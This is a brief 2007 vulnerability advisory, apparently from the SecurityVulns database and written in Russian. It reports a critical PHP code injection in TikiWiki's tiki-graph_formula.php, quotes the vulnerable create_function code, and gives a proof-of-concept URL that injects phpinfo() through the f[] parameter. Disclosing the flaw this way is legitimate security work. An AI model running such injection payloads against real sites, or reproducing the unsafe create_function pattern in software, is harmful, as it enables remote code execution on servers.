TikiWiki php injection

2007-10-10T00:00:00
ID SECURITYVULNS:DOC:18162
Type securityvulns
Reporter Securityvulns
Modified 2007-10-10T00:00:00

Description

оф сайт http://tikiwiki.org/ уязвимость носит критический характер.

файл tiki-graph_formula.php содержит код: foreach( array_values( $_GET['f'] ) as $key=>$formula ) { $formula = convert_formula( $formula ); ... function convert_formula( $formula ) { ... return create_function('$x', "return $formula;"); }

Poc: http://localhost/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=


The Best forum on Web Security Application http://forum.antichat.ru/